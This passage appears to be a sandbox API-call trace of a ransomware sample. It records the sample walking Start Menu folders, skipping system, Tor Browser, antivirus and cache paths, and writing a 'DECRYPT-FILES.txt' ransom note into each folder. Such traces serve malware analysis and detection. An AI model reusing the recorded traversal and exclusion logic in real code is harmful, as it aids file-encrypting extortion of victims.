(lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.405] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.405] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.405] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.406] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.406] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.406] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 75 [0080.406] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.406] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\" [0080.406] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\jkbimi8.tmp" [0080.406] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.406] CloseHandle (hObject=0x0) returned 0 [0080.406] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.406] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d7ae880, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 1 [0080.406] lstrcmpW (lpString1="Programs", lpString2=".") returned 1 [0080.406] lstrcmpW (lpString1="Programs", lpString2="..") returned 1 [0080.406] lstrcatW (in: lpString1="Programs", lpString2="\\" | out: lpString1="Programs\\") returned="Programs\\" [0080.406] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpString2="Programs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\" [0080.406] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Program Files") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch=":\\Windows") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Games\\") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\All Users") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="AhnLab") returned 0x0 [0080.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.407] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 84 [0080.407] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.407] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\jkbimi8.tmp") returned 96 [0080.407] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0080.408] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 84 [0080.408] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.408] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\DECRYPT-FILES.txt") returned 102 [0080.408] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0080.409] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0080.410] CloseHandle (hObject=0x45c) returned 1 [0080.410] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 84 [0080.410] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0080.410] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0080.410] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.410] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.410] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.410] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.410] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0080.410] lstrcmpW (lpString1="Accessories", lpString2=".") returned 1 [0080.410] lstrcmpW (lpString1="Accessories", lpString2="..") returned 1 [0080.410] lstrcatW (in: lpString1="Accessories", lpString2="\\" | out: lpString1="Accessories\\") returned="Accessories\\" [0080.411] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Accessories\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\" [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Program Files") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch=":\\Windows") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Games\\") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\All Users") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="AhnLab") returned 0x0 [0080.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.411] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 96 [0080.411] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.411] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\jkbimi8.tmp") returned 108 [0080.411] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0080.412] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 96 [0080.412] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.412] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\DECRYPT-FILES.txt") returned 114 [0080.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0080.412] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0080.413] CloseHandle (hObject=0x464) returned 1 [0080.414] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 96 [0080.414] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0080.414] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0080.414] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.414] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.414] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.414] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.414] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0080.414] lstrcmpW (lpString1="Accessibility", lpString2=".") returned 1 [0080.414] lstrcmpW (lpString1="Accessibility", lpString2="..") returned 1 [0080.414] lstrcatW (in: lpString1="Accessibility", lpString2="\\" | out: lpString1="Accessibility\\") returned="Accessibility\\" [0080.414] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="Accessibility\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\" [0080.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Program Files") returned 0x0 [0080.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch=":\\Windows") returned 0x0 [0080.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Games\\") returned 0x0 [0080.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\All Users") returned 0x0 [0080.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.415] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.415] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="AhnLab") returned 0x0 [0080.415] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.415] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 110 [0080.415] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.415] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\jkbimi8.tmp") returned 122 [0080.415] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x468 [0080.415] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 110 [0080.415] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.415] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\DECRYPT-FILES.txt") returned 128 [0080.415] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0080.417] WriteFile (in: hFile=0x46c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2d7c8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2d7c8*=0x23fc, lpOverlapped=0x0) returned 1 [0080.418] CloseHandle (hObject=0x46c) returned 1 [0080.419] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 110 [0080.419] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*" [0080.419] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8dd8 [0080.419] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.419] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, 